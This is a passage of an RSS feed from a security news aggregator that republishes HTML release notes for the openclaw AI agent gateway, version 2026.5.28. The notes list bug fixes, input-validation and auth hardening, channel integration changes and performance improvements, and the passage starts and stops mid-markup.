data-hovercard-url="/openclaw/openclaw/pull/86426/hovercard" href="https://github.com/openclaw/openclaw/pull/86426">#86426</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505928215" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85529" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85529/hovercard" href="https://github.com/openclaw/openclaw/pull/85529">#85529</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4529579598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87160" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87160/hovercard" href="https://github.com/openclaw/openclaw/pull/87160">#87160</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeroaltitude/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeroaltitude">@zeroaltitude</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lukeboyett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lukeboyett">@lukeboyett</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiaotian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiaotian">@xiaotian</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/heyitsaamir/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/heyitsaamir">@heyitsaamir</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amittell/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amittell">@amittell</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liorb-mountapps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liorb-mountapps">@liorb-mountapps</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/masatohoshino/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/masatohoshino">@masatohoshino</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bladin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bladin">@bladin</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giodl73-repo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giodl73-repo">@giodl73-repo</a>.</li>
<li>CLI/auth/doctor/providers: reject malformed numeric/timeout/subcommand-version inputs, ignore workspace dotenv provider credentials, wait for respawn child shutdown, bound Codex and GitHub Copilot OAuth/token requests, harden Codex auth probes, warm provider auth off the main thread, honor Codex response timeouts, stop migrating current Claude Haiku 4.5 profiles to Sonnet, bound local service startup, resolve GPT-5.5 without cached catalog, migrate legacy memory auto-provider config, rewrite non-canonical <code>api_key</code> auth profiles, and make doctor restart follow-ups actionable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535278756" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87398" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87398/hovercard" href="https://github.com/openclaw/openclaw/pull/87398">#87398</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4513750971" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86281" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86281/hovercard" href="https://github.com/openclaw/openclaw/pull/86281">#86281</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534263190" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87361" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87361/hovercard" href="https://github.com/openclaw/openclaw/pull/87361">#87361</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4470260031" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83655" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83655/hovercard" href="https://github.com/openclaw/openclaw/pull/83655">#83655</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4538477112" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87559" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87559/hovercard" href="https://github.com/openclaw/openclaw/pull/87559">#87559</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4542269022" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87719" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87719/hovercard" href="https://github.com/openclaw/openclaw/pull/87719">#87719</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Patrick-Erichsen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Patrick-Erichsen">@Patrick-Erichsen</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giodl73-repo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giodl73-repo">@giodl73-repo</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alkor2000/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alkor2000">@alkor2000</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mmaps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mmaps">@mmaps</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nxmxbbd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nxmxbbd">@nxmxbbd</a>.</li>
<li>Gateway/security/session state: expire browser tokens after auth rotation, scope assistant idempotency dedupe, drain probe client closes, avoid stale restart continuation reuse, preserve retry-after fallbacks and stale rate-limit cooldown probes, bound webchat image and artifact transcript scans, include seconds in inbound metadata timestamps, clear completed session active runs, and evict current plugin-state namespaces at row caps. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4544450672" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87810" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87810/hovercard" href="https://github.com/openclaw/openclaw/pull/87810">#87810</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4544792832" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87833" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87833/hovercard" href="https://github.com/openclaw/openclaw/pull/87833">#87833</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Config/parsing/network: reject partial numeric parsing, parse provider/Discord retry headers and dates strictly, honor IPv6 and bare IPv6 <code>no_proxy</code> entries, canonicalize secret target array indexes, and reject malformed media content lengths, inspected TCP ports, marketplace content lengths, cron epochs, sandbox stat fields, unsafe duration values, empty config path segments, noncanonical schema array refs, unsafe Telegram callback pages, and invalid Teams attachment-fetch DNS targets.</li>
<li>Browser/input hardening: reject invalid tab indexes, excessive viewport resizes, explicit zero CDP ports, malformed geolocation options, unsafe screenshot or permission-grant timeouts, loose response-body limits, invalid cookie expiries, and non-finite Browser tool delays/timeouts.</li>
<li>Cron/automation: retry recurring jobs after transient model rate limits before waiting for the next scheduled slot, and preflight model fallbacks before skipping scheduled work. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462211584" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82887" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82887/hovercard" href="https://github.com/openclaw/openclaw/pull/82887">#82887</a>)</li>
<li>Auto-reply/directives: respect provider and relayed channel metadata during directive persistence so channel-originated decisions keep their intended context. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4541541082" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87683" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87683/hovercard" href="https://github.com/openclaw/openclaw/pull/87683">#87683</a>)</li>
<li>WhatsApp: resolve the auth directory from the active profile so profile-scoped WhatsApp installs do not drift to the wrong credential root. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4459071895" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82492" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82492/hovercard" href="https://github.com/openclaw/openclaw/pull/82492">#82492</a>)</li>
<li>Gateway/session state: clear completed session active runs, avoid cold-loading providers for MCP inventory, cache single-session child indexes, cap handshake timers, and bound preauth, auth-guard, media, transcript, readiness, and port options.</li>
<li>Channels/replies: preserve channel-owned progress callbacks when verbose output is off, keep group-room progress suppression intact, prefer external session delivery context, escape Discord component id delimiters, force final TUI chat repaints, show Slack reasoning previews, and normalize Discord/Matrix/Mattermost channel numeric options. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4537084392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87476" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87476/hovercard" href="https://github.com/openclaw/openclaw/pull/87476">#87476</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535879311" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87423" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87423/hovercard" href="https://github.com/openclaw/openclaw/pull/87423">#87423</a>)</li>
<li>Agents/tool args: harden smart-quoted argument repair for edit arrays and exact escaped arguments so model-produced tool calls recover without corrupting valid input. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4519020723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86611" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86611/hovercard" href="https://github.com/openclaw/openclaw/pull/86611">#86611</a>)</li>
<li>Providers/agents: preserve seeded Anthropic signatures, preserve signed thinking payloads, concatenate signature-delta chunks, preserve DeepSeek <code>reasoning_content</code> replay across tier suffixes, apply OpenRouter strict9 ids to Mistral routes, promote Ollama plain-text tool calls, load NVIDIA featured model catalogs, stream MiniMax music generation responses, and recover empty preflight compaction. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539098619" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87593" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87593/hovercard" href="https://github.com/openclaw/openclaw/pull/87593">#87593</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4537557512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87493" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87493/hovercard" href="https://github.com/openclaw/openclaw/pull/87493">#87493</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4424322077" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80775" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80775/hovercard" href="https://github.com/openclaw/openclaw/pull/80775">#80775</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4491159526" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84764" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84764/hovercard" href="https://github.com/openclaw/openclaw/pull/84764">#84764</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>.</li>
<li>Media/images: skip CLI image cache refs when resolving generated images and bound generated video downloads so stale refs and slow providers fail cleanly. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4537825609" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87523" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87523/hovercard" href="https://github.com/openclaw/openclaw/pull/87523">#87523</a>)</li>
<li>File transfer: handle late tar stdin pipe errors after archive validation or unpacking has already settled.</li>
<li>Performance: trust install-record caches between reloads, prefer native JSON parsing, reuse unchanged tool-search catalogs, skip unchanged store serialization, add precomputed session patch writers, reduce store clone allocations, cache manifest model catalog rows and auto-enabled plugin config, avoid full session snapshots for entry reads, defer configured Slack full startup, prefer bundled plugin dist entries, and slim current metadata identity caches. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4542943848" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87760" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87760/hovercard" href="https://github.com/openclaw/openclaw/pull/87760">#87760</a>)</li>
<li>Docker/release/QA: package runtime workspace templates, stream cross-OS served artifacts, preserve sparse Crabbox run artifacts, isolate npm plugin installs per package, reject incompatible package plugin API installs, bound OpenClaw instance logs, plugin gauntlet relay logs, MCP channel buffers, kitchen-sink scans, agent-turn assertions, and release scenario logs, and keep release/google live guards current. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4540781098" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87647" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87647/hovercard" href="https://github.com/openclaw/openclaw/pull/87647">#87647</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4537087511" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87477" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87477/hovercard" href="https://github.com/openclaw/openclaw/pull/87477">#87477</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rohitjavvadi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rohitjavvadi">@rohitjavvadi</a>.</li>
<li>Release/CI: bound manual git fetches, ClawHub verifier responses, ClawHub owner metadata, Parallels limits, startup/test/memory budget parsing, and diffs viewer build warnings so release lanes fail with useful proof instead of hanging. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4544909025" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87839" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87839/hovercard" href="https://github.com/openclaw/openclaw/pull/87839">#87839</a>)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.5.28-beta.1]]></title>
<description><![CDATA[2026.5.28
Highlights

Agent and Codex runtime recovery is steadier: subagents keep cwd/workspace separation, hook context stays prompt-local, session locks release on timeout abort, stale restart continuations are avoided, and Codex app-server/helper failures no longer tear down shared runtime st...]]></description>
<link>https://tsecurity.de/de/3556097/downloads/openclaw-2026528-beta1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556097/downloads/openclaw-2026528-beta1/</guid>
<pubDate>Fri, 29 May 2026 07:03:37 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.5.28</h2>
<h3>Highlights</h3>
<ul>
<li>Agent and Codex runtime recovery is steadier: subagents keep cwd/workspace separation, hook context stays prompt-local, session locks release on timeout abort, stale restart continuations are avoided, and Codex app-server/helper failures no longer tear down shared runtime state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4530733870" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87218" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87218/hovercard" href="https://github.com/openclaw/openclaw/pull/87218">#87218</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4523882966" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86875" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86875/hovercard" href="https://github.com/openclaw/openclaw/pull/86875">#86875</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535658120" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87409" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87409/hovercard" href="https://github.com/openclaw/openclaw/pull/87409">#87409</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535300059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87399" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87399/hovercard" href="https://github.com/openclaw/openclaw/pull/87399">#87399</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534684461" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87375" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87375/hovercard" href="https://github.com/openclaw/openclaw/pull/87375">#87375</a>)</li>
<li>Channel delivery and session identity got safer across outbound plugin hooks, Matrix room ids, iMessage reactions/approvals, Slack final replies, Discord recovered tool warnings, and Microsoft Teams service URL trust checks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345081037" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73706" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73706/hovercard" href="https://github.com/openclaw/openclaw/pull/73706">#73706</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364693778" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75670" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75670/hovercard" href="https://github.com/openclaw/openclaw/issues/75670">#75670</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534435733" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87366" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87366/hovercard" href="https://github.com/openclaw/openclaw/pull/87366">#87366</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536461472" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87451" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87451/hovercard" href="https://github.com/openclaw/openclaw/pull/87451">#87451</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4533570288" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87334" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87334/hovercard" href="https://github.com/openclaw/openclaw/pull/87334">#87334</a>)</li>
<li>Mobile and chat surfaces got a broader refresh: the iOS Pro UI, Gateway chat transport, onboarding, Talk permissions, WebChat reconnect delivery, and session picker behavior now preserve more state across reconnects and empty searches. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534475516" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87367" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87367/hovercard" href="https://github.com/openclaw/openclaw/pull/87367">#87367</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4537867197" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87531" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87531/hovercard" href="https://github.com/openclaw/openclaw/pull/87531">#87531</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4541460557" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87682" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87682/hovercard" href="https://github.com/openclaw/openclaw/pull/87682">#87682</a>)</li>
<li>CLI, auth, doctor, and provider paths fail faster and recover more clearly: malformed numeric/version options are rejected, OAuth and local service startup requests are bounded, legacy <code>api_key</code> auth profiles migrate to canonical form, and restart guidance is actionable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535278756" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87398" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87398/hovercard" href="https://github.com/openclaw/openclaw/pull/87398">#87398</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4513750971" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86281" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86281/hovercard" href="https://github.com/openclaw/openclaw/pull/86281">#86281</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534263190" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87361" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87361/hovercard" href="https://github.com/openclaw/openclaw/pull/87361">#87361</a>)</li>
<li>Plugin and Gateway hot paths do less repeated work while preserving cache correctness for install records, config JSON parsing, tool search catalogs, session stores, manifest model rows, auto-enabled plugin config, browser tokens, and viewer assets. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4520495731" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86699" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86699/hovercard" href="https://github.com/openclaw/openclaw/pull/86699">#86699</a>)</li>
<li>Release, QA, and E2E validation now bound more log, artifact, harness, and cross-OS waits so failing lanes produce proof instead of hanging or false-greening.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>Status: show active subagent details in status output.</li>
<li>Diffs: split the default language pack and expand default Diffs language coverage while keeping the host floor aligned. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534535212" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87370" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87370/hovercard" href="https://github.com/openclaw/openclaw/pull/87370">#87370</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534563692" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87372" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87372/hovercard" href="https://github.com/openclaw/openclaw/pull/87372">#87372</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</li>
<li>ClawHub: add plugin display names plus skill verification and trust surfaces. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534140530" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87354" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87354/hovercard" href="https://github.com/openclaw/openclaw/pull/87354">#87354</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4520495731" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86699" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86699/hovercard" href="https://github.com/openclaw/openclaw/pull/86699">#86699</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thewilloftheshadow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thewilloftheshadow">@thewilloftheshadow</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Patrick-Erichsen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Patrick-Erichsen">@Patrick-Erichsen</a>.</li>
<li>iOS: refresh the dev app with Pro Command, Chat, Agents, and Settings tabs wired to gateway sessions, diagnostics, chat, and realtime Talk. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534475516" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87367" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87367/hovercard" href="https://github.com/openclaw/openclaw/pull/87367">#87367</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>.</li>
<li>Docs: clarify Codex computer-use setup, paste-token stdin auth setup, macOS gateway sleep troubleshooting, native Codex hook relay recovery, container model auth, install deployment cards, device-token admin gating, and backport targets. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4533118068" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87313" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87313/hovercard" href="https://github.com/openclaw/openclaw/pull/87313">#87313</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4223303633" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63050" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63050/hovercard" href="https://github.com/openclaw/openclaw/pull/63050">#63050</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bdjben/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bdjben">@bdjben</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liaoandi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liaoandi">@liaoandi</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thewilloftheshadow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thewilloftheshadow">@thewilloftheshadow</a>.</li>
<li>PDF/tools: use ClawPDF for PDF extraction and surface MCP structured content in agent tool results. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4541241418" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87670" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87670/hovercard" href="https://github.com/openclaw/openclaw/pull/87670">#87670</a>)</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Agents: fall back to local config pruning when the optional <code>agents delete</code> Gateway probe cannot authenticate, so offline installs can still delete agents without removing shared workspaces.</li>
<li>Tighten phone-control mutation authorization [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4529379329" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87150" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87150/hovercard" href="https://github.com/openclaw/openclaw/pull/87150">#87150</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Clarify directive persistence authorization policy [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4515051227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86369" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86369/hovercard" href="https://github.com/openclaw/openclaw/pull/86369">#86369</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Agents/Codex: keep spawned agent cwd/workspace state separated, keep hook context prompt-local, release session locks on timeout abort, avoid session event queue self-wait, preserve shared app-server state across startup or helper failures, keep native hook relay alive across restarts, route workspace memory through tools, resolve Codex runtime models first, report quarantined dynamic tools, format <code>skills</code> command output, and bound compaction/steering retries. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4530733870" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87218" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87218/hovercard" href="https://github.com/openclaw/openclaw/pull/87218">#87218</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4523882966" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86875" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86875/hovercard" href="https://github.com/openclaw/openclaw/pull/86875">#86875</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4512236257" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86123" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86123/hovercard" href="https://github.com/openclaw/openclaw/pull/86123">#86123</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535300059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87399" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87399/hovercard" href="https://github.com/openclaw/openclaw/pull/87399">#87399</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534684461" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87375" 